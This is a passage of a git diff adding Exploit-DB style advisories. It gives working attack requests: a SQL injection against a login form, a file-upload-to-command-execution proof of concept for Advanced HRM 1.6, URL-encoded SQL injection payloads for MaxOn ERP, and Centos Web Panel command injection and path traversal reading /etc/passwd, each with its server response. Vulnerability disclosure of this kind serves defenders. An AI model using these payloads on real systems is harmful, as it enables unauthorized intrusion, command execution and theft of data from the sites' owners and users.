+ +POST /[PATH]/login.php HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 240 +user='%20aND%20(SeleCT%207804%20FroM(SeleCT%20COUNT(*),ConCaT((SeleCT%20(ELT(7804=7804,1))),ConCaT_WS(0x203a20,usER(),DaTaBaSE(),VERSIon()),FloOR(RaND(0)*2))x%20FroM%20INFORMaTIon_SCHEMa.PLugINS%20GroUP%20BY%20x)a)--%20Efe&pass=&login=login +HTTP/1.1 200 OK +Date: Sat, 15 Oct 2018 00:51:03 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=b6mgibtddijtde10ti6umf9kc5; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 1843 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45604.txt b/exploits/php/webapps/45604.txt new file mode 100644 index 000000000..442b06c7c --- /dev/null +++ b/exploits/php/webapps/45604.txt 
@@ -0,0 +1,51 @@ +# Exploit Title: Advanced HRM 1.6 - Remote Code Execution +# Google Dork: intext:"Advanced HRM" +# Date: 2018-10-06 +# Exploit Author: Renos Nikolaou +# Vendor Homepage: https://coderpixel.com/ +# Software Link: https://codecanyon.net/item/advanced-hrm/17767006 +# Version: 1.6 +# Tested on: Windows 10 +# CVE: N/A +# Description : Advanced HRM 1.6 allows users to upload arbitrary files which +# leads to a remote command execution on the remote server. + +# PoC +# 1) Create a php file with the below code: + + + +# 2) Login to Advanced HRM portal as low priviliage user +# 3) At the right hand side go to Update Profile --> Change Picture ( http://domain/hrm/user/edit-profile ) +# 4) Click Browse and upload your file containing the PHP code mentioned at step 1. +# 5) Click Update +# 6) Right click at the Profile image and select Copy image Location +# 7) Paste the URL into your browser. Will be similar to: http://domain/hrm/assets/employee_pic/cmd.php +# 8) Verify the exploit: http://domain/hrm/assets/employee_pic/cmd.php?cmd=id + +# The request: +=================== + +POST /hrm/user/update-user-avatar HTTP/1.1 +Host: domain +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://domain/hrm/user/edit-profile +Content-Type: multipart/form-data; boundary=---------------------------6610657524685 +Content-Length: 378 +Connection: close +Upgrade-Insecure-Requests: 1 + +-----------------------------6610657524685 +Content-Disposition: form-data; name="image"; filename="cmd.php" +Content-Type: application/octet-stream + + + +-----------------------------6610657524685 +Content-Disposition: form-data; name="_token" + +yWFLEpnGV1n5OzK7sAPWg6UVJG02Q +-----------------------------6610657524685-- \ No newline at end of file 
diff --git a/exploits/php/webapps/45605.txt b/exploits/php/webapps/45605.txt
new file mode 100644
index 000000000..9d501bcb1
--- /dev/null
+++ b/exploits/php/webapps/45605.txt
@@ -0,0 +1,118 @@ +# Exploit Title: MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection +# Dork: N/A +# Date: 2018-10-15 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.talagasoft.com +# Software Link: http://demo.maxonerp.com/ +# Software Download: https://datapacket.dl.sourceforge.net/project/maxon/maxon.rar +# Version: 8.x-9.x +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# Description +# All users can run sql injection codes. +# +# [PATH]/pos/controllers/User.php Line:350 +# [PATH]/application/controllers/User.php Line:414 +# function log_activity(){ +# $sql="select * from syslog where 1=1"; +# $nomor="";$jenis="";$user=""; +# if($this->input->post()){ +# if($nomor=$this->input->post('nomor')){ +# if($nomor!="")$sql.=" and no_bukti='$nomor'"; +# } +# if($user=$this->input->post('user')){ +# if($user!="")$sql.=" and userid='$user'"; +# } +# if($jenis=$this->input->post('jenis')){ +# if($jenis!="")$sql.=" and jenis_cmd='$jenis'"; +# } +# +# } +# $sql.=" order by tgljam desc limit 1000"; +# $data["user"]=$user; +# $data["nomor"]=$nomor; +# $data["jenis"]=$jenis; +# +# $data['syslog']=$this->db->query($sql); +# $this->template->display("log_list",$data); +# } + +# POC: +# 1) +# http://TARGET/[PATH]/index.php/user/log_activity + +POST /index.php/user/log_activity HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 253 +nomor=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 +HTTP/1.1 500 Internal 
Server Error +Date: Sat, 15 Oct 2018 00:22:45 GMT +Server: Apache +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +X-Powered-By: PleskLin +Connection: close +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://TARGET/[PATH]/index.php/user/log_activity + +POST /index.php/user/log_activity HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 252 +user=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 +HTTP/1.1 500 Internal Server Error +Date: Sat, 15 Oct 2018 00:29:02 GMT +Server: Apache +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +X-Powered-By: PleskLin +Connection: close +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://TARGET/[PATH]/index.php/user/log_activity + +POST /index.php/user/log_activity HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 253 
+jenis=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 +HTTP/1.1 500 Internal Server Error +Date: Sat, 15 Oct 2018 00:35:52 GMT +Server: Apache +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +X-Powered-By: PleskLin +Connection: close +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45610.txt b/exploits/php/webapps/45610.txt new file mode 100644 index 000000000..51de30ea7 --- /dev/null +++ b/exploits/php/webapps/45610.txt 
@@ -0,0 +1,172 @@
+# Exploit Title: Centos Web Panel 0.9.8.480 Multiple Vulnerabilities
+# Exploit Author: Seccops - Siber Güvenlik Hizmetleri (https://seccops.com)
+# Vendor Homepage: http://centos-webpanel.com/
+# Software Link: http://centos-webpanel.com/system-requirements
+# Version: 0.9.8.480
+# Tested on: Centos 7
+# Vulnerability Types: Command Injection, Local File Inclusion, Cross-site Scripting, Frame Injection
+# CVE: -
+
+### Vulnerability Name: Command Injection ###
+
+1)
+Proof URL: http://localhost:2030/admin/index.php?service_start=opendkim;expr 268409241 - 2;x
+Parameter Name: service_start
+Parameter Type: GET
+Attack Pattern: opendkim%3bexpr+268409241+-+2%3bx
+
+HTTP Request:
+
+GET /admin/index.php?service_start=opendkim%3bexpr%20268409241%20-%202%3bx HTTP/1.1
+Host: localhost:2030
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Cookie: cwpsrv-983b3c1326b3c5dafa7941a1ef2fbf67=jhg556f3k83kpgbhbdfsd0pps6; resolve_ids=0; roundcube_sessid=j2h7ad1kb1coji7hba2bo5pil5; order_dir_list_by=7D
+Referer: http://localhost:2030/admin/
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
+
+Note: Mathematical process: 268409241 - 2. So, the result is expected 268409239.
+
+HTTP Response:
+
+HTTP/1.1 200 OK
+Server: cwpsrv
+X-Powered-By: PHP/7.0.24
+Connection: keep-alive
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Pragma: no-cache
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Date: Mon, 01 Oct 2018 21:06:42 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+
+ HTML Content:
+
+
+ + WARNING!
268409239
+        sh: x.service: command not found
+        

+
+2)
+Proof URL: http://localhost:2030/admin/index.php?service_restart=sshd;expr 268409241 - 2;x
+Parameter Name: service_restart
+Parameter Type: GET
+Attack Pattern: sshd%3bexpr+268409241+-+2%3bx
+
+3)
+Proof URL: http://localhost:2030/admin/index.php?service_fullstatus=opendkim;expr 268409241 - 2;x
+Parameter Name: service_fullstatus
+Parameter Type: GET
+Attack Pattern: opendkim%3bexpr+268409241+-+2%3bx
+
+4)
+Proof URL: http://localhost:2030/admin/index.php?service_stop=named;expr 268409241 - 2;x
+Parameter Name: service_stop
+Parameter Type: GET
+Attack Pattern: named%3bexpr+268409241+-+2%3bx
+
+### Vulnerability Name: Local File Inclusion ###
+
+1)
+Proof URL: http://localhost:2030/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd
+Parameter Name: file
+Parameter Type: GET
+Attack Pattern: %2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
+
+HTTP Request:
+
+GET /admin/index.php?module=file_editor&file=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
+Host: localhost:2030
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Cookie: cwpsrv-983b3c1326b3c5dafa7941a1ef2fbf67=jhg556f3k83kpgbhbdfsd0pps6; resolve_ids=0; roundcube_sessid=j2h7ad1kb1coji7hba2bo5pil5; order_dir_list_by=7D
+Referer: http://localhost:2030/admin/index.php
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
+
+HTTP Response:
+
+HTTP/1.1 200 OK
+Server: cwpsrv
+X-Powered-By: PHP/7.0.24
+Connection: keep-alive
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Pragma: no-cache
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Date: Mon, 01 Oct 2018 20:45:19 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+
+ HTML Content:
+ File info [stats]:
-rw-r--r-- 1 root root 2272 Sep 28 07:48 /../../../../../../../../../../../etc/passwd
+        

Contents of File: /../../../../../../../../../../../etc/passwd

+
+